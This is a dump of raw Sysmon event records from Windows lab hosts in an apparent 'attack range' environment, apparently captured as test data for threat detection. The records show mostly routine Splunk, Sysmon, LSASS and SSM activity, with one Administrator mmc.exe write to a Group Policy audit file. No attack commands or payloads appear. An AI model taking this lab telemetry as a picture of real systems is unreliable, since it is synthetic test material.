10:42:02.962{C8EA50B7-F11D-6215-0B00-000000003802}628792C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286148Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.962{C8EA50B7-0F2D-6216-C404-000000003802}1164ATTACKRANGE\AdministratorC:\Windows\system32\mmc.exeC:\Windows\System32\GroupPolicy\Machine\Microsoft\Windows NT\Audit\audit.csvMD5=5C8E0AD8CA0247ECB6096B541A3B37EF,SHA256=89CADDD8192B214276DA165B4F3AC980D242CF71704535B5DC4A7BB0EB15EA31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286147Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.708{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=540E0E5424D25B5A6431F4D572958C88,SHA256=3E047B4F1EB3369F0868F4769CE7E7B9DCA2168D0A27ABA1B8D14FA0096068E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:02.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8A1011518AC183257D7FD8CBC2CC8021,SHA256=A4FBEE7DEB6E50A13C7ABF23BCD45DAD3C3DD209D0DCED79842DD5F269A869D7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286146Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F7A-6216-CD04-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286145Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286144Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286143Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286142Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286141Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-0F7A-6216-CD04-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286140Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.270{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F7A-6216-CD04-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286139Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.271{C8EA50B7-0F7A-6216-CD04-000000003802}2024C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000286156Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.975{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=199A2BF36F4F5D2C4B7579D19F2CBD5F,SHA256=F5B0101A48D58EEBD04E8471B270402745B19FC801D214F7BBBE8C1A25951700,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286155Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.975{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=03FF42C16DD6775B1C796EAB2D5D2C20,SHA256=C0123278C312246C345367B0EE05CBABA91FD8A0106A7985C2F8429C0F3F3131,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286154Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.709{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEF25CCBA20D553B2E2D35DF5F39CA7E,SHA256=BB6513D3AB19898523ED10B2D37D632E7DE661595281FB0D45D5835C05AB8C7C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:03.284{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26FE530140EDFAD7160C059B7E262F73,SHA256=9358A6CEFB07767E000F56622973C828727D6765C6F45B2976802D3C7A42C6F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286153Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.247{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-125MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286152Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.118{C8EA50B7-F11D-6215-0B00-000000003802}6286044C:\Windows\system32\lsass.exe{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000286151Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:03.118{C8EA50B7-F11F-6215-1000-000000003802}364NT AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\Windows\security\audit\audit.csvMD5=5C8E0AD8CA0247ECB6096B541A3B37EF,SHA256=89CADDD8192B214276DA165B4F3AC980D242CF71704535B5DC4A7BB0EB15EA31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286173Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.723{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1E1F0103EC086D1CA752C8EEAE8A6C25,SHA256=EB8E05E04CF56D1C5FE6EDCEDC3FC8B975107CF62D26AD3275171570474F5C3D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000215155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:42:04.300{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E4D3900001D29210F8203C329009CDEE,SHA256=F23B5F7996FFD3084E052916DE3DD5602A0465F1C4C3EFB22162FF20E632B611,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000286172Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.703{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53308-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x8000000000000000286171Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.460{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53307-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286170Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.460{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53307-false10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286169Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.442{C8EA50B7-F11D-6215-0B00-000000003802}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53306-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 354300x8000000000000000286168Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:02.442{C8EA50B7-F11F-6215-1000-000000003802}364C:\Windows\System32\svchost.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local53306-truefe80:0:0:0:dc9d:9662:799b:139cwin-dc-tcontreras-attack-range-173.attackrange.local389ldap 23542300x8000000000000000286167Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.257{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\surveyor-20220223083249-126MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286166Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.084{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EE08336BE7D4B63C9E6143BAD7EAB97D,SHA256=20640DDC335D9875F018DEFB8DC034000C8AED23616F38783D79B47140928A71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000286165Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.084{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4716E05E861A2A666A6A81844C69B47,SHA256=00C17BF1F27C720128186331DB086A0C5F55CF9DA4ED943CC90DBBFF0693E227,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000286164Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-0F7C-6216-CE04-000000003802}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286163Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286162Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286161Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286160Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F11F-6215-0C00-000000003802}8285152C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000286159Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-0F7C-6216-CE04-000000003802}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000286158Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.021{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-0F7C-6216-CE04-000000003802}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000286157Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:42:04.023{C8EA50B7-0F7C-6216-CE04-000000003802}2324C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program 